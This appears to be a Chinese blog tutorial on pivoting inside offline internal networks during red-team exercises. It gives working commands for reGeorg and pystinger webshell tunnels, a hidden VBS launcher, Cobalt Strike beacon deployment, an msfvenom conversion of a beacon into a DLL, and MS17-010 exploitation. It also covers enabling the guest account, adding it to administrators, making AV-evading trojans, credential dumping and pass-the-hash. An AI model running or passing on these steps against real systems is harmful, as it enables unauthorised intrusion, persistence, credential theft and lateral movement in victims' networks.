内网渗透-不出网渗透技巧
前言
最近打了几场hw,遇到几个内网环境都不通外网,整理下用到的几种不出网内网渗透技巧。
socks隧道搭建
常用工具:reGeorg,Proxifier
用的比较多的一个隧道代理工具
1、上传对应语言的脚本到目标服务器的网站目录下
data:image/s3,"s3://crabby-images/f698b/f698b4f9738956d7de8031192688fc9bef357d8c" alt=""
2、通过浏览器访问上传的脚本文件,显示如下表示成功。
data:image/s3,"s3://crabby-images/3aad8/3aad8cc1219230aa575e2be4fc4890af021be446" alt=""
3、本地运行reGeorgSocksProxy.py,-p为指定隧道的端口,-u为刚刚上传的tunnel文件地址。
python reGeorgSocksProxy.py -p 8888 -u http://x.x.x.x/tunnel.php
4、打开Proxifier,配置ip和端口
data:image/s3,"s3://crabby-images/78a23/78a231dfb97ad2a1ee8d4b77872b1a5498735f51" alt=""
5、成功把本机带入内网。
data:image/s3,"s3://crabby-images/7aabe/7aabe1023f254f2ca110100a92eb92a4ab235bd2" alt=""
cs上线
cs逐渐成为内网渗透中使用最多的工具,在目标不通外网的情况下,无法直接与公网的cs服务端建立连接。
pystinger
下载地址:https://github.com/FunnyWolf/pystinger
通过webshell实现内网SOCK4代理,端口映射可以使目标不出网情况下在cs上线。
data:image/s3,"s3://crabby-images/cdab3/cdab316c9fb9c449b732e346128af4c380f62afe" alt=""
直接使用cs多主机上线方法。
首先上传对应语言的脚本到网站目录下。
data:image/s3,"s3://crabby-images/f1f7b/f1f7bfc44f2df22edf9ec2ed16374dbfb9411f71" alt=""
将stinger_server.exe上传到目标服务器
创建stinger_server.vbs文件,示例如下:
Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c D:\XXXXX\stinger_server.exe 0.0.0.0",vbhide
data:image/s3,"s3://crabby-images/2c91b/2c91b52dd56aef0a52838506c241da1ea52e531e" alt=""
执行vbs脚本,启动服务端。
data:image/s3,"s3://crabby-images/7263b/7263badf447922859cf6375cd69f1baa76d2c313" alt=""
把stinger_client上传到公网vps,-w指定proxy的url地址运行。
chmod 777 stinger_client
./stinger_client -w http://x.x.x.x/proxy.jsp -l 0.0.0.0 -p 60000
data:image/s3,"s3://crabby-images/deccc/deccc9ef40627f1cf73b03e780bef417c3711f4b" alt=""
cs新建监听器,设置为目标机器的内网ip,端口默认60020。
data:image/s3,"s3://crabby-images/3e8d5/3e8d5b790ed4d250e7b90e2d2a1be1c1a9ca9237" alt=""
data:image/s3,"s3://crabby-images/5f63d/5f63d3ca88fb7386f737853105a0191f23737685" alt=""
根据新建的监听器,制作免杀木马,cs成功上线。
data:image/s3,"s3://crabby-images/a18c7/a18c7b707e24f06a84c31892d9bf6f3cd4ed337f" alt=""
抓取上线的主机对密。
data:image/s3,"s3://crabby-images/92409/92409862d6c89af330c04b3e8aef02311dc0e037" alt=""
对内网其它主机进行pth攻击,选择刚才建立的监听器。
data:image/s3,"s3://crabby-images/54692/54692329699c8188fa9a2c7c9d43689c640a49a0" alt=""
目标主机成功上线。
data:image/s3,"s3://crabby-images/9537e/9537e633afa989f9162972929c5d41e1440ea43e" alt=""
坑点:使用过程中cs会话可能假死掉,需要把stinger_server.exe进程结束掉,然后重新启动。
在目标内网搭建cs服务端
如果拿下了目标主机的管理员权限,可以激活guest用户,建立基于http的socks隧道,登录远程桌面,在目标内网搭建cs服务端。
缺点:被发现概率上升;需要安装java环境;基于web的socks隧道速度很慢,心态容易蹦。
首先激活guest用户
net user guest /active:yes
net user guest 1q2w3e4r@
net localgroup administrators guest /add
登录guest用户,查看目标是否存在java运行环境,不存在的话上传安装包安装。
data:image/s3,"s3://crabby-images/0469a/0469a1ad056f98e92107c0ca70667b224d81a3b7" alt=""
上传cs4.0到目标服务器。
data:image/s3,"s3://crabby-images/d3653/d3653bd104191f90db9b6414da622a2a778adb5a" alt=""
运行服务端
teamserver.bat x.x.x.x 1q2w3e4r
data:image/s3,"s3://crabby-images/0e9fe/0e9fe7bc54ebf3d38671ec35605e4bf4fe93eb26" alt=""
点击cs.bat运行客户端
data:image/s3,"s3://crabby-images/ac4df/ac4df575e6c08c036fdfb7fffd7f67fa17846c43" alt=""
data:image/s3,"s3://crabby-images/7d618/7d618513a57a0034b4907c020537a494bb254708" alt=""
然后就可以直接在内网操作cs了。
ms17010横向利用
内网渗透中常用的攻击手段,随着补丁和杀软的普及,能利用的场景越来越少,而且容易造成目标蓝屏,影响业务,所以谨慎使用。
之前的利用都是在通外网下情况下利用msf攻击。
本次在目标不出网的情况下进行利用。
方程式漏洞利用工具
首先使用pystinger多主机模式使内网主机在cs上线,生成对应的内网监听器。
data:image/s3,"s3://crabby-images/09336/09336813f9cf8cfcd0c886faa01d3724ff4d28d9" alt=""
生成对应监听器的bin文件。
data:image/s3,"s3://crabby-images/43bd5/43bd5e0597a7a1e35d92892b91c7d2d9e54c548c" alt=""
使用msf把cs生成的bin文件转化为方程式利用工具可以使用的dll文件。
msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x64 --platform windows -f dll -o x64.dll
data:image/s3,"s3://crabby-images/80ef4/80ef49765d8408dfefc244aeaf4e442afa43d254" alt=""
把原来的x64.dll文件替换掉,把工具上传到目标主机上。
设置targetip为存在漏洞的主机ip,设置系统类型,点击attack执行利用工具,利用成功返回success。
data:image/s3,"s3://crabby-images/3f888/3f888cdfea04453208a9c6433b47dd6fcf501c0a" alt=""
选择doublepulsar模块,配置ip选择位数,默认加载dll,点击attack在攻击主机执行刚刚生成的x64.dll文件。
data:image/s3,"s3://crabby-images/73738/737388f785f0467a0c54e5f1c10e1ffa8dd45959" alt=""
目标在cs上线成功。
data:image/s3,"s3://crabby-images/7b204/7b2045150118a8bc0e4f09016e97625f1969b5c0" alt=""
cs永恒之蓝利用插件
下载地址:https://github.com/phink-team/Cobaltstrike-MS17-010
cs安装下载的插件,导入aggressor.cna文件。
使用pystinger多主机模式使内网主机在cs上线,生成对应的内网监听器test。
data:image/s3,"s3://crabby-images/a219b/a219b45a86a3224b9979a99fe8a6e175d1446cb3" alt=""
内网主机上线后,右键使用ms17-010攻击插件。
data:image/s3,"s3://crabby-images/0d5fd/0d5fdab220b8295395ff471f83e6772e9421830f" alt=""
ip配置为存在漏洞的主机ip,监听器选择test,次数更改为1次,降低蓝屏风险。
data:image/s3,"s3://crabby-images/57ce8/57ce848aabc0d9285ec3bd5fd931ea4e94ab159d" alt=""
成功通过ms17-010攻击其它主机,cs上线成功。
data:image/s3,"s3://crabby-images/629e3/629e3166cee96981d3980ab56ef6ffa60b8b0637" alt=""
data:image/s3,"s3://crabby-images/86e07/86e073440e96c213357c5ab24e1ecba9fbfd2f41" alt=""
总结
本次列举了最近实战用到的几个小技巧,技术含量不高,希望能帮到大家。